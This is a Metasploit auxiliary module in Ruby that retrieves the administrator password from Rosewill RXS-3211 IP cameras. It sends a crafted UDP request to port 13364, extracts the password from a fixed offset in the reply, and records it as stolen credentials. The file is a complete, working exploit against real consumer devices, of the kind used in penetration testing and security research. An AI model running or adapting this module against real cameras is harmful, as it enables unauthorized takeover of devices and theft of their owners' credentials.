##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##


require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Tcp
	include Msf::Auxiliary::Report
	include Msf::Auxiliary::Scanner

	def initialize
		super(
			'Name'        => 'Rosewill RXS-3211 IP Camera Password Retriever',
			'Version'     => '$Revision$',
			'Description' => %q{
					This module takes advantage of a protocol design issue with the Rosewill admin
				executable in order to retrieve passwords, allowing remote attackers to take
				administrative control over the device.  Other similar IP Cameras such as Edimax,
				Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested.
				The protocol deisgn issue also allows attackers to reset passwords on the device.
			},
			'Author'      => 'Ben Schmidt',
			'References'  =>
				[
					[ 'URL', 'http://spareclockcycles.org/exploiting-an-ip-camera-control-protocol/' ],
				],
			'License'     => MSF_LICENSE
		)

		register_options(
			[
				Opt::CHOST,
				Opt::RPORT(13364),
			], self.class)
	end

	def run_host(ip)
		#Protocol
		target_mac = "\xff\xff\xff\xff\xff\xff"
		cmd  = "\x00"          #Request
		cmd << "\x06\xff\xf9"  #Type

		password = nil

		begin
			# Create an unbound UDP socket if no CHOST is specified, otherwise
			# create a UDP socket bound to CHOST (in order to avail of pivoting)
			udp_sock = Rex::Socket::Udp.create( {
				'LocalHost' => datastore['CHOST'] || nil,
				'PeerHost'  => ip,
				'PeerPort'  => datastore['RPORT'],
				'Context'   =>
				{
					'Msf' => framework,
					'MsfExploit' => self
				}
			})

			udp_sock.put(target_mac+cmd)

			res = udp_sock.recvfrom(65535, 0.5) and res[1]

			#Parse the reply if we get a response
			if res
				password = parse_reply(res)
			end
		rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
			print_error("Connection error")
		rescue ::Interrupt
			raise $!
		rescue ::Exception => e
			print_error("Unknown error: #{e.class} #{e}")
		ensure
			udp_sock.close if udp_sock
		end

		#Store the password if the parser returns something
		if password
			print_status("Password retrieved: #{password.to_s}")
			report_auth_info({
				:host         => rhost,
				:port         => rport,
				:sname        => 'ipcam',
				:duplicate_ok => false,
				:pass         => password,
			})
		end
	end

	def parse_reply(pkt)
		@results ||= {}

		# Ignore "empty" packets
		return nil if not pkt[1]

		if(pkt[1] =~ /^::ffff:/)
			pkt[1] = pkt[1].sub(/^::ffff:/, '')
		end

		return pkt[0][333,12] if pkt[0][6,4] == "\x01\x06\xff\xf9"
	end

end